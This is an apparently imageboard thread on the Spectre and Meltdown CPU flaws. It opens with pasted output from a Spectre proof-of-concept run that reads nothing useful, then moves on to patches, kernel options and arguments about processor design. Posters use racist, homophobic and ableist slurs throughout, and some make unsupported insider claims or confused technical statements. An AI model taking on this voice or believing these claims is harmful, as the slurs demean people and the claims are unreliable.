(second best: 0xFE score=999)Reading at malicious_x = 0xffffffffffdfef14... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)Reading at malicious_x = 0xffffffffffdfef15... Unclear: 0xFF=’?’ score=999 (second best: 0xFC score=999)Reading at malicious_x = 0xffffffffffdfef16... Unclear: 0xFE=’?’ score=999 (second best: 0xFD score=999)Reading at malicious_x = 0xffffffffffdfef17... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)Reading at malicious_x = 0xffffffffffdfef18... Unclear: 0xFC=’?’ score=999 (second best: 0xF9 score=999)Reading at malicious_x = 0xffffffffffdfef19... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)Reading at malicious_x = 0xffffffffffdfef1a... Unclear: 0xFF=’?’ score=999 (second best: 0xFD score=999)Reading at malicious_x = 0xffffffffffdfef1b... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)Reading at malicious_x = 0xffffffffffdfef1c... Unclear: 0xFD=’?’ score=999 (second best: 0xFC score=999)Reading at malicious_x = 0xffffffffffdfef1d... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)Reading at malicious_x = 0xffffffffffdfef1e... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)Reading at malicious_x = 0xffffffffffdfef1f... Unclear: 0xFF=’?’ score=999 (second best: 0xFD score=999)
any tweaks?

looks good for you, did you update to the latest kernel?

i test it on my x200 booting from live usb ubuntu and it can see the texts, try a few times, the results varies from time to time

Those browsers won't get the fix until they update to 57+ you tard.

Tried a couple, absolutely nothing.
kernel (I know I should upgrade to 4.9, if they have KPTI with grsec kernel.)
4.8.17-hardened-r2-gnu

ur good to go i guess,

time for me to actually use something secure

I'll keep trying.

>using a rooted console for general computing and keeping a PC for gaymes
the levels of autism on this website exceed my expectations

Nope, too expensive. The whole idea of stream computing AKA "GPUs" is to make the cores as fucking simple as possible to maximise bang-per-transistor, and then whip out as many of those cores as possible in a given transistor/power budget. A feature only goes in if performance increase is higher than increase in circuitry size and/or power draw.

...and here I thought that I fit in on Holla Forums. Apparently my Tegra2 netbook I'm writing this on makes me a filthy outsider.

youtu.be/SqbNWCehbmU
Thread theme , THEY knew the Twins KNEW !!!

I believe Microsoft Research once worked on an OS architecture like this. Interesting stuff, but it wouldn't help against attacks like these. You can exploit those bugs from fucking JITted JavaScript, of all things.

This has already been done to hell and back, with miserable results. The magical compilers that wizardly know the perfect instruction execution order beforehand never materialised BECAUSE IT'S LITERALLY IMPOSSIBLE YOU RETARDED FAGGOT. The optimal order changes on each execution due to variable latency operations like memory accesses, FP operations (remember denormal and NaN corner cases) and everything that can throw a fucking exception. Not to mention that free EUs vary depending on preceding code at every branch merge.

The clusterfuck you're describing is called VLIW and is now used only in things like DSP cores that execute extremely simple and predictable code with very few branching paths. It's FUBAR for everything else.

hahahahaha first gen atom users will have their revenge for buying these things, forgetting about them, and them being mocked about it

Well I didn't say it was going to be easy. You need perfect code to do something like abandoning on die schedulers for reducing heat. But with the pajeets and shit code of literally every OS today it would have to be rewrote from the ground up to achieve such a feet. Ontop of the proccessors silicone having to be fabricated to a more rigid standard for more consistent programs executing on the silicone.
Again I didn't say it would be easy, all code and compilers are pajeet tier shit today. It would need to be rewrote from the ground up to be simpler and easier to control. But it is the only way foward as x86 has hit it's heat-death limit.

That's because most software writers have no fucking clue what they are doing with the layers upon layers of abstraction, a poor quality of work from the assembly up in compilers, and or both. Terry davis built a fucking compiler himself in a few years singlehandedly. It has taken those faggots at GCC, LLVM, and MVS decades and hundreds of people in cheap manpower to build said compilers. Which still get updated for bug fixes every so often.

We need better engineers who know what the fuck they are doing to build the foundation, then you can have your rust and C like languages that hold your hand every step of the way.

We need to abandon the multi user paradigm for single user terminals completely, every "user" OS should be made for one user at a time. Think like Smalltalk or a Lisp machine. A lot of these problems are cropping up because of multiple privilege level bullshit (speculative execution exploit exposes memory across privilege levels) and a single USER DEVELOPER OS could be locked down tighter than a nun's cunt. Terry's on to something with his OS.

Only all the driver shit prevents simply using minix3 for everything that is clusterfucked in the linux kernel and win kernel

I watched the recent CCC talk by that Russian hacker on the IME, and he claims that the minix onboard it is significantly altered from mainline, almost everything is changed but he didn't elaborate further.

All Intel chips since 1995 have been affected.
insider knowledge, this is all i can disclose

Anybody know if Transmeta’s affected?

I retired my D945GCLF2 board this November, in favour of 15h AMD A-series APU. It's still usable but CPU fan fried (and it was replaced once already) - maybe I should make a new box for sensitive data usage and leave this desktop for multimedia use...

can you post some pics as proof you larping faggot?

this info i can find online

Sounds like they were unfortunate enough to work with a feminist.

I love the full disclosure policy that OpenBSD is so infamous for. It's an embarrasement that not all free software projects have adopted it.

WEW LAD!

x86 is a buggy as hell trainwreck and needs to be replace as soon as possible.

My body is ready for this.

If was about writing a secure OS, then you can but all you want that Microsoft dropped funding when they found out what their experts were up to.

Is Spectre interprocess? The pdf's example code is single process.

He dindu nuffin, he wuz a gud boi!

Here's that second errata Theo mentioned on geek.com, wew. It's pretty bad when some of the potential problems can be easily explained to normies, like AE30 here.

Maybe in a year :DDDDDDDDDDD

CromeOS also patched this last month with CromeOS 63
>support.google.com/faqs/answer/7622138#chromeos

LINUX BTFO x2

be sure to include another backdoor that can now send data over net without exploits ;)

Were coming for your white babies. All ten million of them.

Hi Intel.

Bump.

Did you read what I wrote!? THIS IS LITERALLY UN-FUCKING-POSSIBLE!
There is no "perfect" fixed scheduling order. The optimal order is different on each invocation of a code sequence. This means that an execution schedule that is pre-baked at compile time is going to be suboptimal most of the time - regardless of the schedule.

At my uni, writing a compiler has been a mandatory freshman term project for decades. It's not that fucking hard. Then again, I'm living in eastern yuroland where diversity quotas are not yet a thing and faggots who fail can be dropped without repercussions.
Writing a simple compiler that werks is one thing. Writing one that generates well-optimised code for multiple platforms while faithfully implementing complex standards and quirks of other compilers for compatibility with existing source code is another.

Did you not read what else I wrote?
Improving the chink manufacturing standards would fix that. Or hell not sending it all to the chinks to make with slave labor to begin with.
And writing one that accounts for subtle differences in the silicone of a single architecture and yet is well optimized with security is another. Of which that doesn't exist yet. Idiots like you are the cancer that is killing and holding back proccessor technology.

Variable instruction latencies have nothing to do with "manufacturing standards" you retarded idiot. You can't predict whether a memory read will be served in 4 cycles from L1, in 200 cycles from RAM, or cause a fucking page fault that jumps to a kernel handler doing who-knows-what with it. The variability is in this instruction's very nature, and it's just one example.
And u suk cox. Come back when you learn something about how processors work.

Yes you can predict it, by accounting for the interface at compile time and by making the assembly language account for such things in its instruction set while also having perfect no crash and no faulting assembly with expections for edge cases. Then you can obfuscate it up the stack via things like a compiler and languages. Sure it complicates the fuck out of the assembly language but it is way more effiecient too.

i have drawn this more than 15 years ago :)

They copied the fix from the OBSD, because they sit downstream of them. GoogleOS is still a backdoored piece of garbage with easy priv escalation methods root a box.

Linux is even worse garbage, but nothing comes close to the absolute disaster of a code base that is winshit.

This news has alread slid off the normie web more or less, the lying fake news is doing its job.

IS THERE A KERNEL CONFIG OPTION TO DISABLE THIS SHIT YET?

I think it only slows down 35% if cpu is intel, if cpu is amd then not, set your cpu AMD to not use the degradation

"set" you can manually patch out the patchin the source

youtu.be/LC1WuKdPVCQ

Doesn't look like too much of a performance drop. I wish DF did Linux videos